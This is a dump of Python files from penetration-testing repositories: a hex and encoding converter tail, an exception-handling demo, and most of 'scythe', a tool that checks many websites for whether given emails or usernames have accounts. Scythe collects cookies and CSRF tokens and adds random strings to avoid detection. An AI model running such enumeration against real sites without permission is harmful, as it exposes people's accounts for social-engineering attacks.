in_hex = ascToHex(to_convert)
little_endian = toLittleEndian(in_hex)
print 'Original:', to_convert, '\nHex:', '0x' + in_hex
print 'Little-endian:', little_endian
elif mode == '-2ascii':
in_ascii = toAscii(to_convert)
print 'Original:', to_convert, '\nAscii:', in_ascii
elif mode == '-2dec':
in_dec = toDecimal(to_convert)
print 'Original:', to_convert, '\nDecimal:', in_dec
elif mode == '-2oct':
in_oct = toOctal(to_convert)
print 'Original:', to_convert, '\nOctal:', in_oct, '\n\n[!] Note: Remove any extra leading zeroes.'
elif mode == '-2le':
inpt = toAscii(to_convert)
in_hex = ascToHex(inpt)
in_LE = toLittleEndian(in_hex)
print 'Original:', '0x' + to_convert, '\nLittle-endian:', in_LE
elif mode == '-hex2bin':
in_bin = hexToBin(to_convert)
print 'Originial:', to_convert, '\nBinary:', in_bin
elif mode == '-bin2hex':
in_hex = binToHex(to_convert)
print in_hex
elif mode == '-dec2hex':
in_hex = decToHex(to_convert)
print in_hex
elif mode == '-hex2b64':
in_b64 = hexToB64(to_convert)
print in_b64
else:
print 'Improper format. Review and re-submit.\n'
sys.exit(0)
main()
| 19.240602 | 101 | 0.657748 |
Hands-On-Penetration-Testing-with-Python | #! /usr/bin/python3.5
class ExceptionHandeling():
def __init__(self):
pass
def div_1(self,num1,num2):
try:
num3=num1/num2
print("Division result : " +str(num3))
except Exception as ex:
print("Exception : "+str(ex))
def div_2(self,num1,num2):
try:
num3=num1/num2
print("Division result : " +str(num3))
except Exception as ex:
print("Exception : "+str(ex))
finally:
print("Cleaning Up")
del num1
del num2
def div_3(self,num1,num2):
try:
if num2 == 0:
raise ValueError('Division by 0 will throw exception')
else:
num3=num1/num2
print("Division result : " +str(num3))
except Exception as exc:
print("Exception : "+str(exc))
obj=ExceptionHandeling()
obj.div_1(10,2)
obj.div_1(10,0)
print("\n")
obj.div_2(10,2)
obj.div_2(10,0)
print("\n")
obj.div_3(10,2)
obj.div_3(10,0)
| 18.511628 | 58 | 0.634845 |
Penetration-Testing-Study-Notes | #! /usr/bin/env python
# -*- coding: utf-8 -*-
#
"""
scythe: account enumerator
Account Enumerator is designed to make it simple to perform account
enumeration as part of security testing. The framework offers the ability
to easily create new modules (XML files) and speed up the process of testing.
This tool was created with 2 main use cases in mind:
- The ability to test a range of email addresses across a range of sites (e.g.
social media, blogging platforms, etc...) to find where those targets have
active accounts. This can be useful in a social engineering test where you
have email accounts for a company and want to list where these users have
used their work email for 3rd party web based services.
- The ability to quickly create a custom testcase module and use it to enumerate
for a list of active accounts. Using either a list of know usernames, email
addresses, or a dictionary of common account names.
This program is released as is and is not designed to be used to test again sites
where you do not have permission. Any modules provided are for demonstration purposes
and may breach end user license agreements if used against a site. Your mileage may
vary... be responsible!
External module depenancies:
colorama (Windows only, optional)
"""
import os
import re
import signal
import urllib
import urllib2
import string
import textwrap
import sys
import traceback
import time
import Queue
import random
from Cookie import BaseCookie
from threading import Thread, activeCount, Lock, current_thread
from random import Random
from optparse import OptionParser, OptionGroup, SUPPRESS_HELP
from array import *
from xml.dom.minidom import parse
__author__ = 'Chris John Riley'
__license__ = 'BSD (3-Clause)'
__version__ = '0.2.81'
__codename__ = 'Lazy Lizard'
__date__ = '24 May 2013'
__maintainer__ = 'ChrisJohnRiley'
__email__ = '[email protected]'
__status__ = 'Beta'
modules = []
accounts = []
success = []
color = {}
queue = Queue.Queue()
startTime = time.clock()
sigint = False
def logo():
# because ASCII-art is the future!
logo = '''
,,
mm `7MM
MM MM
,pP"Ybd ,p6"bo `7M' `MF'mmMMmm MMpMMMb. .gP"Ya
8I `" 6M' OO VA ,V MM MM MM ,M' Yb
`YMMMa. 8M VA ,V MM MM MM 8M""""""
L. I8 YM. , VVV MM MM MM YM. ,
M9mmmP' YMbmd' ,V `Mbmo.JMML JMML.`Mbmmd'
,V
OOb" ::: account harvester :::'''
# add version, codename and maintainer to logo
print logo
print string.rjust('ver ' + __version__ + ' (' + __codename__ + ')', 74)
print string.rjust(__maintainer__, 73)
def extract_module_data(file, module_dom):
# extract module information from the provided dom
for each in module_dom:
try:
xmlData = {}
# try/except blocks to handle badly formed XML modules
try:
xmlData['name'] = each.getElementsByTagName('name')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['name'] = 'unspecified'
# set URL - prepend http:// if not present in string
if not each.getElementsByTagName('url')[0].firstChild.nodeValue.startswith('http'):
xmlData['url'] = 'http://' + each.getElementsByTagName('url')[0].firstChild.nodeValue
else:
xmlData['url'] = each.getElementsByTagName('url')[0].firstChild.nodeValue
# set Method
try:
xmlData['method'] = each.getElementsByTagName('method')[0].firstChild.nodeValue
except (IndexError, AttributeError):
# default to GET if not specified
xmlData['method'] = 'GET'
# set POST Parameters if set in the module XML
try:
if each.getElementsByTagName('postParameters')[0].firstChild.nodeValue.lower() == 'false':
# handle instances where people enter False insterad of leaving this field blank
xmlData['postParameters'] = ''
else:
xmlData['postParameters'] = \
each.getElementsByTagName('postParameters')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['postParameters'] = ''
# set headers if set in the module XML
try:
if each.getElementsByTagName('headers')[0].firstChild.nodeValue.lower() == 'false':
# handle instances where people enter False insterad of leaving this field blank
xmlData['headers'] = ''
else:
xmlData['headers'] = \
each.getElementsByTagName('headers')[0].firstChild.nodeValue.split(",")
except (IndexError, AttributeError):
xmlData['headers'] = ''
# set request cookie if set in the module XML
try:
if each.getElementsByTagName('requestCookie')[0].firstChild.nodeValue.lower() == 'true':
xmlData['requestCookie'] = True
else:
xmlData['requestCookie'] = False
except (IndexError, AttributeError):
xmlData['requestCookie'] = False
# set csrf mode if set in the module XML
# Extract csrf_url and csrf_regex if present
# if not default to False
try:
if each.getElementsByTagName('requestCSRF')[0].firstChild.nodeValue.lower() == 'false':
xmlData['requestCSRF'] = False
# set csrf_url and csrf_regex to False by default
xmlData['csrf_url'] = False
xmlData['csrf_regex'] = False
else:
xmlData['requestCSRF'] = True
if each.getElementsByTagName('csrf_url')[0].firstChild:
xmlData['csrf_url'] = \
each.getElementsByTagName('csrf_url')[0].firstChild.nodeValue
else:
# if no specific csrf_url is set, default to xmlData['url']'
xmlData['csrf_url'] = xmlData['url']
if each.getElementsByTagName('csrf_regex')[0].firstChild:
xmlData['csrf_regex'] = \
each.getElementsByTagName('csrf_regex')[0].firstChild.nodeValue
else:
xmlData['csrf_regex'] = 'unspecified'
except (IndexError, AttributeError):
# if requestCSRF not present or noneType
xmlData['requestCSRF'] = False
xmlData['csrf_url'] = False
xmlData['csrf_regex'] = False
# set success match if specified in the module XML
try:
xmlData['successmatch'] = \
each.getElementsByTagName('successmatch')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['successmatch'] = ''
# set negative match if specified in the module XML
try:
# handle instances where people enter False insterad of leaving this field blank
if each.getElementsByTagName('negativematch')[0].firstChild.nodeValue.lower() == 'false':
xmlData['negativematch'] = ''
else:
xmlData['negativematch'] = \
each.getElementsByTagName('negativematch')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['negativematch'] = ''
# set error match if specified in the module XML
try:
# handle instances where people enter False insterad of leaving this field blank
if each.getElementsByTagName('errormatch')[0].firstChild.nodeValue.lower() == 'false':
xmlData['errormatch'] = ''
else:
xmlData['errormatch'] = \
each.getElementsByTagName('errormatch')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['errormatch'] = ''
# set message if specified in the module XML
try:
# handle instances where people enter False insterad of leaving this field blank
if each.getElementsByTagName('message')[0].firstChild.nodeValue.lower() == 'false':
xmlData['message'] = ''
else:
xmlData['message'] = \
each.getElementsByTagName('message')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['message'] = ''
# set module date
try:
xmlData['date'] = each.getElementsByTagName('date')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['date'] = 'unspecified'
# set module version if specified in the module XML
try:
xmlData['version'] = each.getElementsByTagName('version')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['version'] = 'unspecified'
# set module author
try:
xmlData['author'] = each.getElementsByTagName('author')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['author'] = 'unlisted'
# set category
try:
xmlData['category'] = each.getElementsByTagName('category')[0].firstChild.nodeValue
except (IndexError, AttributeError):
xmlData['category'] = 'unspecified'
# filter modules based on selected categories
if xmlData['category'].lower() in (cat.lower() for cat in opts.category) or \
"all" in (cat.lower() for cat in opts.category) or \
(opts.single.lower() and opts.single.lower() in xmlData['name'].lower()) or \
(file.lower() in opts.single.lower()):
if xmlData['category'].lower() == "example" and \
("example" not in (cat.lower() for cat in opts.category) \
and not opts.single):
# skip example module when running with all or default settings
if opts.verbose:
print "\t[" + color['red'] + "!" + color['end'] \
+ "] Skipping example module : %s" % xmlData['name']
else:
print "\t[" + color['yellow'] + "+" + color['end'] \
+"] Extracted module information from %s" \
% xmlData['name']
modules.append(xmlData)
# print module message if present
if xmlData['message']:
print textwrap.fill(("\t[" + color['yellow'] + "!" + color['end'] \
+"] "+ color['red'] + "Note" + color['end'] +" [%s]:" \
% xmlData['name']),
initial_indent='', subsequent_indent='\t -> ', width=100)
print textwrap.fill(("\t -> %s" % xmlData['message']),
initial_indent='', subsequent_indent='\t -> ', width=80)
else:
if opts.debug and not opts.category == "single":
print "\t[" + color['red'] + "!" + color['end'] \
+ "] Skipping module %s. Not in category (%s)" \
% (xmlData['name'], opts.category)
except Exception, ex:
print "\t[" + color['red'] + "!" + color['end'] \
+ "] Failed to extracted module information\n\t\tError: %s" % ex
if opts.debug:
print "\n\t[" + color['red'] + "!" + color['end'] + "] ",
traceback.print_exc()
continue
def output_modules():
# print information about the loaded module(s)
print "\n ------------------------------------------------------------------------------"
print string.center(color['yellow'] + ">>>>>" + color['end'] + " Module Information " + \
color['yellow'] + "<<<<<" + color['end'], 100)
print " ------------------------------------------------------------------------------"
if opts.verbose and not opts.listmodules:
for mod in modules:
print textwrap.fill((" NAME: %s" % mod['name']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" URL: %s" % mod['url']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" METHOD: %s" % mod['method']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" HEADERS: %s" % mod['headers']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" POST PARAMETERS: %s" % mod['postParameters']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" REQUEST COOKIE: %s" % mod['requestCookie']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" REQUEST CSRF TOKEN: %s" % mod['requestCSRF']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" SUCCESS MATCH: %s" % mod['successmatch']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" NEGATIVE MATCH: %s" % mod['negativematch']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" ERROR MATCH: %s" % mod['errormatch']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" MODULE NOTE: %s" % mod['message']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" DATE: %s" % mod['date']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" VERSION: %s" % mod['version']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" AUTHOR: %s" % mod['author']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" CATEGORY: %s" % mod['category']),
initial_indent='', subsequent_indent=' -> ', width=80)
print " ------------------------------------------------------------------------------"
else:
print " ", "| Name |".ljust(35), "| Category |".ljust(26), "| Version |".ljust(8)
print " ------------------------------------------------------------------------------"
for mod in modules:
print " " + mod['name'].ljust(37) + mod['category'].ljust(30) + mod['version'].ljust(10)
print " ------------------------------------------------------------------------------\n"
# exit after providing module list
sys.exit(0)
def output_accounts():
# print information about the accounts loaded from accountfile
print "\n ------------------------------------------------------------------------------"
print string.center(color['yellow'] + ">>>>>" + color['end'] + " Accounts Loaded " + \
color['yellow'] + "<<<<<" + color['end'], 100)
print " ------------------------------------------------------------------------------"
for a in accounts:
print textwrap.fill((" Account name: %s" % a),
initial_indent='', subsequent_indent=' -> ', width=80)
print " ------------------------------------------------------------------------------\n"
def output_success():
# print information about success matches
if opts.summary or (opts.verbose and opts.summary):
print "\n ------------------------------------------------------------------------------"
print string.center(color['yellow'] + ">>>>>" + color['end'] + " Successful Matches " + \
color['yellow'] + "<<<<<" + color['end'], 100)
print " ------------------------------------------------------------------------------"
s_success = sorted(success, key=lambda k: k['name']) # group by site name
# print normal summary table on request (--summary)
if not opts.verbose and opts.summary:
print "\n ------------------------------------------------------------------------------"
print " ", "| Module |".ljust(35), " | Account |".ljust(28)
print " ------------------------------------------------------------------------------"
for s in s_success:
print " " + s['name'].ljust(37) + s['account'].ljust(30)
print " ------------------------------------------------------------------------------\n"
# print verbose summary on request (-v --summary)
elif opts.verbose and opts.summary:
for s in s_success:
print textwrap.fill((" NAME: \t\t\t%s" % s['name']),
initial_indent='', subsequent_indent='\t -> ', width=80)
print textwrap.fill((" ACCOUNT: \t\t%s" % s['account']),
initial_indent='', subsequent_indent='\t -> ', width=80)
print textwrap.fill((" URL: \t\t\t%s" % s['url']),
initial_indent='', subsequent_indent='\t -> ', width=80)
print textwrap.fill((" METHOD: \t\t%s" % s['method']),
initial_indent='', subsequent_indent='\t -> ', width=80)
print textwrap.fill((" POST PARAMETERS: \t%s" % s['postParameters']),
initial_indent='', subsequent_indent='\t -> ', width=80)
print " ------------------------------------------------------------------------------"
else:
print " ------------------------------------------------------------------------------\n"
def load_modules():
# load the modules from moduledir
# only XML files are permitted
if not "all" in (cat.lower() for cat in opts.category):
# using options from command line
if opts.verbose:
print " [" + color['yellow'] + "-" + color['end'] \
+ "] using command line supplied category : %s" \
% ", ".join(opts.category)
for (path, dirs, files) in os.walk(opts.moduledir):
for d in dirs:
if d.startswith("."): # ignore hidden . dirctories
dirs.remove(d)
print " [" + color['yellow'] + "-" + color['end'] \
+"] Starting to load modules from %s" % path
for file in files:
if not path.endswith('/'):
path = path + '/'
# read in modules
if file.endswith('.xml') and not file.startswith('.'):
if opts.verbose:
print "\t[ ] Checking module : %s" % file
try:
module_dom = parse(path + file)
module_dom = module_dom.getElementsByTagName('site')
extract_module_data(file, module_dom)
except:
print "\t[" + color['red'] + "!" + color['end'] \
+"] Error parsing %s module, check XML" % file
elif opts.debug:
print "\t[" + color['red'] + "!" + color['end'] \
+ "] Skipping non-XML file : %s" % file
if opts.verbose or opts.listmodules:
output_modules() #debug and module output
def load_accounts():
# if account is passed in we use that, otherwise
# load accounts from accountfile
# one account per line
if opts.account:
# load account from command line
if opts.verbose:
print " [" + color['yellow'] + "-" + color['end'] \
+ "] using command line supplied user(s) : %s" \
% ", ".join(opts.account)
for a in opts.account:
# add all command line accounts to array for testcases
if a: # ignore empty fields
accounts.append(a)
else:
# load accounts from file if it exists
if not os.path.exists(opts.accountfile):
print "\n [" + color['red'] + "!" + color['end'] \
+ "] The supplied file (%s) does not exist!" \
% opts.accountfile
sys.exit(0)
account_file = open(opts.accountfile, 'r')
account_read = account_file.readlines()
account_read = [item.rstrip() for item in account_read]
for a in account_read:
if not a.startswith("#"): # ignore comment lines in accountfile
accounts.append(a)
if opts.verbose:
output_accounts() # debug output
def create_testcases():
# create a list of testcases from accounts and modules
#
# replace functions are in place to replace <ACCOUNT>
# with the account names presented
# the script will also replace any instances of <RANDOM>
# with a random string (8) to avoid detection
testcases = []
tempcase = {}
for a in accounts:
for m in modules:
rand = ''.join( Random().sample(string.letters+string.digits, 8) ) # 8 random chars
tempcase['url'] = m['url'].replace("<ACCOUNT>", a).replace("<RANDOM>", rand)
tempcase['account'] = a
tempcase['name'] = m['name']
tempcase['method'] = m['method']
tempcase['postParameters'] = m['postParameters'].replace("<ACCOUNT>", a).replace("<RANDOM>", rand)
tempcase['headers'] = m['headers']
tempcase['requestCookie'] = m['requestCookie']
tempcase['requestCSRF'] = m['requestCSRF']
tempcase['csrf_url'] = m['csrf_url']
tempcase['csrf_regex'] = m['csrf_regex']
tempcase['successmatch'] = m['successmatch']
tempcase['negativematch'] = m['negativematch']
tempcase['errormatch'] = m['errormatch']
testcases.append(tempcase)
tempcase = {}
if testcases:
return testcases
else:
print " [" + color['red'] + "!" + color['end'] + \
"] No testcases created, check your accounts and module settings"
print
sys.exit(0)
def request_handler(testcases):
# handle requests present in testcases
print "\n ------------------------------------------------------------------------------"
print string.center(color['yellow'] + ">>>>>" + color['end'] + " Testcases " + \
color['yellow'] + "<<<<<" + color['end'], 100)
print " ------------------------------------------------------------------------------"
print " [" + color['yellow'] + "-" + color['end'] \
+"] Starting testcases (%d in total)" % len(testcases)
if opts.wait:
print " [" + color['yellow'] + "-" + color['end'] \
+"] Throttling in place (%.2f seconds)\n" % opts.wait
elif opts.threads:
print " [" + color['yellow'] + "-" + color['end'] \
+"] Threading in use (%d threads max)\n" % opts.threads
else:
print
progress = 0 # initiate progress count
if opts.threads > 1:
threads = []
for test in testcases:
# add testcases to queue
queue.put(test)
# create progress update lock
progress_lock = Lock()
while not queue.empty() and not sigint:
# only allow a limited number of threads
if opts.threads >= activeCount() and not sigint:
# get next test from queue
test = queue.get()
try:
# setup thread to perform test
t = Thread(target=make_request, args=(test,))
t.daemon=True
threads.append(t)
t.start()
finally:
# iterate progress value for the progress bar
progress = len(testcases) - queue.qsize()
# call progressbar
progress_lock.acquire()
try:
progressbar(progress, len(testcases))
finally:
progress_lock.release()
# mark task as done
queue.task_done()
# wait for queue and threads to end before continuing
while activeCount() > 1:
# keep main program active to catch keyboard interrupts
time.sleep(0.1)
for thread in threads:
thread.join()
# no more active threads. resolve queue
queue.join()
else:
for test in testcases:
# make request without using threading
make_request(test)
# iterate progress value for the progress bar
progress = progress +1
# call progressbar
progressbar(progress, len(testcases))
if opts.wait: # wait X seconds as per wait setting
time.sleep(opts.wait)
return
def progressbar(progress, total):
# progressbar
if total > 50: # only show progress on tests of > 50
if not progress == 0:
# set percentage
progress_percentage = int(100 / (float(total) / float(progress)))
# display progress at set points
total = float(total)
# calculate progress for 25, 50, 75, and 99%
vals = [int(total/100*25), int(total/100*50), int(total/100*75), int(total-1)]
if progress in vals:
print " [" + color['yellow'] + "-" + color['end'] +"] [%s] %s%% complete\n" \
% ((color['yellow'] + ("#"*(progress_percentage / 10)) + \
color['end']).ljust(10, "."),progress_percentage),
def make_request(test, retry=0, wait_time=False):
# make request and add output to array
# set threadname
if not current_thread().name == 'MainThread':
threadname = "[" + current_thread().name +"] >"
else:
# return blank string when not using threading
threadname = '>'
# GET method worker
if test['method'] == 'GET':
test, resp, r_info, req = get_request(test)
# success match
if resp and test['successmatch']:
matched = success_check(resp, test['successmatch'])
if matched:
print " [" + color['green'] + "X" + color['end'] + "] Account %s exists on %s" \
% (test['account'], test['name'])
success.append(test)
if opts.debug:
print # spacing forverbose output
if opts.outputfile:
# log to outputfile
opts.outputfile.write("Account " + test['account'] + " exists on " \
+ test['name'] +"\n")
# error match
if resp and test['errormatch']:
error = error_check(resp, test['errormatch'])
if error and retry >= opts.retries:
print " [" + color['red'] + "!" + color['end'] + \
"] %s Retries exceeded when testing account %s on %s" \
% (threadname, test['account'], test['name'])
elif error:
print " [" + color['yellow'] + "!" + color['end'] + \
"] %s Error detected when testing account %s on %s" \
% (threadname, test['account'], test['name'])
# wait X seconds and retry
if wait_time:
# double existing wait_time
wait_time = wait_time * 2
else:
# set starting point for wait_time
wait_time = opts.retrytime
if opts.verbose:
print " [ ] %s Waiting %d seconds before retry" \
% (threadname, wait_time)
time.sleep(wait_time)
# increment retry counter
retry = retry + 1
if opts.verbose:
print " [ ] %s Attempting retry (%d of %d)" \
% (threadname, retry, opts.retries)
make_request(test, retry, wait_time)
return
# negative match
if resp and test['negativematch']:
matched = negative_check(resp, test['negativematch'])
if matched and opts.verbose:
print " [" + color['red'] + "X" + color['end'] + "] Negative matched %s on %s" \
% (test['account'], test['name'])
# advance debug output
if resp and opts.debugoutput:
debug_save_response(test, resp, r_info, req)
return
# POST method worker
elif test['method'] == 'POST':
test, resp, r_info, req = post_request(test)
# success match
if resp and test['successmatch']:
matched = success_check(resp, test['successmatch'])
if matched:
print " [" + color['green'] + "X" + color['end'] + "] Account %s exists on %s" \
% (test['account'], test['name'])
success.append(test)
if opts.debug:
print # spacing forverbose output
if opts.outputfile:
# log to outputfile
opts.outputfile.write("Account " + test['account'] + " exists on " \
+ test['name'] +"\n")
# error match
if resp and test['errormatch']:
error = error_check(resp, test['errormatch'])
if error and retry >= opts.retries:
print " [" + color['red'] + "!" + color['end'] + \
"] %s Retries exceeded when testing account %s on %s" \
% (threadname, test['account'], test['name'])
elif error:
print " [" + color['yellow'] + "!" + color['end'] + \
"] %s Error detected when testing account %s on %s" \
% (threadname, test['account'], test['name'])
# wait X seconds and retry
if wait_time:
# double existing wait_time
wait_time = wait_time * 2
else:
# set starting point for wait_time
wait_time = opts.retrytime
if opts.verbose:
print " [ ] %s Waiting %d seconds before retry" \
% (threadname, wait_time)
time.sleep(wait_time)
# increment retry counter
retry = retry + 1
if opts.verbose:
print " [ ] %s Attempting retry (%d of %d)" \
% (threadname, retry, opts.retries)
make_request(test, retry, wait_time)
# negative match
if resp and test['negativematch']:
matched = negative_check(resp, test['negativematch'])
if matched and opts.verbose:
print " [" + color['red'] + "X" + color['end'] + "] Negative matched %s on %s" \
% (test['account'], test['name'])
if resp and opts.debugoutput:
debug_save_response(test, resp, r_info, req)
return
else:
print " [" + color['red'] + "!" + color['end'] + "] Unknown Method %s : %s" \
% test['method'], test['url']
return
def get_request(test):
# perform GET request
urllib.urlcleanup() # clear cache
try:
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
req_headers = { 'User-Agent' : user_agent }
for each in test['headers']:
key, val = each.split(":", 1)
key = key.lstrip()
val = val.lstrip()
req_headers[key] = val
if test['requestCookie'] or test['requestCSRF']:
# request cookie and csrf token if set in module XML
cookie_val, csrf_val = request_value(test)
if cookie_val:
req_headers['cookie'] = cookie_val
if csrf_val:
# replace <CSRFTOKEN> with the collected token
test['url'] = test['url'].replace("<CSRFTOKEN>", csrf_val)
test['postParameters'] = test['postParameters'].replace("<CSRFTOKEN>", csrf_val)
test['headers'] = [h.replace('<CSRFTOKEN>', csrf_val) for h in test['headers']]
if opts.debug:
# print debug output
print textwrap.fill((" [ ] URL (GET): %s" % test['url']),
initial_indent='', subsequent_indent=' -> ', width=80)
print
# assign NullHTTPErrorProcessor as default opener
opener = urllib2.build_opener(NullHTTPErrorProcessor())
urllib2.install_opener(opener)
req = urllib2.Request(test['url'], headers=req_headers)
f = urllib2.urlopen(req)
r_body = f.read()
r_info = f.info()
f.close()
# handle instances where the response body is 0 bytes in length
if not r_body:
print " [" + color['red'] + "!" + color['end'] + "] Zero byte response received from %s" \
% test['name']
r_body = "<Scythe Message: Empty response from server>"
# returned updated test and response data
return test, r_body, r_info, req
except Exception:
print textwrap.fill((" [" + color['red'] + "!" + color['end'] + "] Error contacting %s" \
% test['url']), initial_indent='', subsequent_indent='\t', width=80)
if opts.debug:
for ex in traceback.format_exc().splitlines():
print textwrap.fill((" %s" \
% str(ex)), initial_indent='', subsequent_indent='\t', width=80)
print
return test, False, False, req
def post_request(test):
# perform POST request
urllib.urlcleanup() # clear cache
try:
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
req_headers = { 'User-Agent' : user_agent }
if test['requestCookie'] or test['requestCSRF']:
# request cookie and csrf token if set in module XML
cookie_val, csrf_val = request_value(test)
if cookie_val:
req_headers['cookie'] = cookie_val
if csrf_val:
# replace <CSRFTOKEN> with the collected token
test['url'] = test['url'].replace("<CSRFTOKEN>", csrf_val)
test['postParameters'] = test['postParameters'].replace("<CSRFTOKEN>", csrf_val)
test['headers'] = [h.replace('<CSRFTOKEN>', csrf_val) for h in test['headers']]
if test['headers']:
for each in test['headers']:
key, val = each.split(":", 1)
key = key.lstrip()
val = val.lstrip()
req_headers[key] = val
if opts.debug:
# print debug output
print textwrap.fill((" [ ] URL (POST): %s" % test['url']),
initial_indent='', subsequent_indent=' -> ', width=80)
print textwrap.fill((" [ ] POST PARAMETERS: %s" % test['postParameters']),
initial_indent='', subsequent_indent=' -> ', width=80)
print
# assign NullHTTPErrorProcessor as default opener
opener = urllib2.build_opener(NullHTTPErrorProcessor())
urllib2.install_opener(opener)
req = urllib2.Request(test['url'], test['postParameters'], req_headers)
f = urllib2.urlopen(req)
r_body = f.read()
r_info = f.info()
f.close()
# handle instances where the response body is 0 bytes in length
if not r_body:
print " [" + color['red'] + "!" + color['end'] + "] Zero byte response received from %s" \
% test['name']
r_body = "<Scythe Message: Empty response from server>"
# returned updated test and response data
return test, r_body, r_info, req
except Exception:
print textwrap.fill((" [" + color['red'] + "!" + color['end'] + "] Error contacting %s" \
% test['url']), initial_indent='', subsequent_indent='\t', width=80)
if opts.debug:
for ex in traceback.format_exc().splitlines():
print textwrap.fill((" %s" \
% str(ex)), initial_indent='', subsequent_indent='\t', width=80)
print
return test, False, False, req
def request_value(test):
# request a cookie or CSRF token from the target site for use during the logon attempt
urllib.urlcleanup() # clear cache
# assign NullHTTPErrorProcessor as default opener
opener = urllib2.build_opener(NullHTTPErrorProcessor())
urllib2.install_opener(opener)
# capture cookie first for use with the CSRF token request
# capture Set-Cookie
if test['requestCookie']:
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
req_headers = { 'User-Agent' : user_agent }
if test['csrf_url']:
# if csrf_url is set, use the same page to collect cookies
url = test['csrf_url']
else:
url = test['url'].split("?", 1)[0] # strip parameters from url where present
req_val = urllib2.Request(url, headers=req_headers)
response = urllib2.urlopen(req_val)
resp_body = response.read()
if response.info().getheader('Set-Cookie'):
set_cookie = response.info().getheader('Set-Cookie') # grab Set-cookie
# work Set-cookie into valid cookies to set
bcookie = BaseCookie(set_cookie)
# strip off unneeded attributes (e.g. expires, path, HTTPOnly etc...
cookie_val = bcookie.output(attrs=[], header="").lstrip()
else:
cookie_val = False
print " [" + color['red'] + "!" + color['end'] \
+ "] Set-Cookie Error: No valid Set-Cookie response received"
else:
cookie_val = False
# capture CSRF token (using regex from module XML)
if test['requestCSRF']:
user_agent = 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'
req_headers = { 'User-Agent' : user_agent }
if cookie_val:
# if a cookie value exists, use the existing response
if opts.debug:
print " [" + color['yellow'] + "-" + color['end'] \
+ "] Using existing response to gather CSRF token"
else:
# get new response to work with
url = test['csrf_url']
req_val = urllib2.Request(url, headers=req_headers)
response = urllib2.urlopen(req_val)
try:
csrf_regex = re.compile(test['csrf_regex'])
match = re.search(csrf_regex, resp_body)
if match:
csrf_val = match.group(1)
else:
csrf_val = False
print " [" + color['red'] + "!" + color['end'] \
+ "] Invalid CSRF regex. Please check parameters"
except:
print " [" + color['red'] + "!" + color['end'] \
+ "] Invalid CSRF regex. Please check parameters"
if opts.debug:
print "\n\t[" + color['red'] + "!" + color['end'] + "] ",
traceback.print_exc()
else:
csrf_val = False
return cookie_val, csrf_val
def error_check(data, errormatch):
# checks response data against errormatch regex
try:
regex = re.compile(errormatch)
if regex.search(data):
return True
else:
return False
except:
print " [" + color['red'] + "!" + color['end'] \
+ "] Invalid in error check. Please check parameter"
if opts.debug:
print "\n\t[" + color['red'] + "!" + color['end'] + "] ",
traceback.print_exc()
def success_check(data, successmatch):
# checks response data against successmatch regex
try:
regex = re.compile(successmatch)
if regex.search(data):
return True
else:
return False
except:
print " [" + color['red'] + "!" + color['end'] \
+ "] Invalid in success check. Please check parameter"
if opts.debug:
print "\n\t[" + color['red'] + "!" + color['end'] + "] ",
traceback.print_exc()
def negative_check(data, negativematch):
# checks response data against negativematch regex
try:
regex = re.compile(negativematch)
if regex.search(data):
return True
else:
return False
except:
print " [" + color['red'] + "!" + color['end'] \
+ "] Invalid in negative check. Please check parameter"
if opts.debug:
print "\n\t[" + color['red'] + "!" + color['end'] + "] ",
traceback.print_exc()
def debug_save_response(test, resp, r_info, req):
# save advanced deug responses to ./debug/
# get time to attach to filename
timenow = int(time.time())
# set testname, remove spaces
testname = re.sub(r'[^\w]', '_', test['name']) + "_"
# check debug directory exists, if not create it
if not os.path.exists('./debug/'):
os.makedirs('./debug/')
# filename for html and headers, strip unusable chars from filenames
htmlfile = testname + str(timenow)
htmlfile = './debug/' + re.sub(r'[^\w]', '_', htmlfile) + '.html' # strip unsuitable chars
hdrfile = testname + str(timenow)
hdrfile = './debug/' + re.sub(r'[^\w]', '_', hdrfile) + '.headers' # strip unsuitable chars
# format headers
header_output = []
header_output.append('---------------------\nrequest headers\n---------------------\n')
for key in req.headers:
header_output.append(key + ': ' + req.headers[key])
header_output.append('\n---------------------\nresponse headers\n---------------------\n')
for each in r_info.headers:
header_output.append(each.rstrip())
header_output.append('\n')
# check if file exists, if so add random number to filename
if os.path.isfile(htmlfile):
rand_addition = str(random.randint(0000, 9999)).zfill(4)
htmlfile = htmlfile[:-5] + '_' + rand_addition + '.html'
hdrfile = hdrfile[:-8] + '_' + rand_addition + '.headers'
# open file for writing
f_html = open(htmlfile, 'w')
f_headers = open(hdrfile, 'w')
# write response and close
f_html.write(resp)
f_html.close()
# write headers and close
f_headers.write("\n".join(header_output))
f_headers.close()
print " [" + color['yellow'] + ">" + color['end'] + "] Saved debug output to %s[.html|.header]" % htmlfile[:-5]
def signal_handler(signal, frame):
# handle CTRL + C events
# globally signal threads to end
global sigint
sigint = True # turn on SIGINT
print
if not len(success) == 0:
if opts.summary or (opts.verbose and opts.summary):
print " [" + color['red'] + "!" + color['end'] \
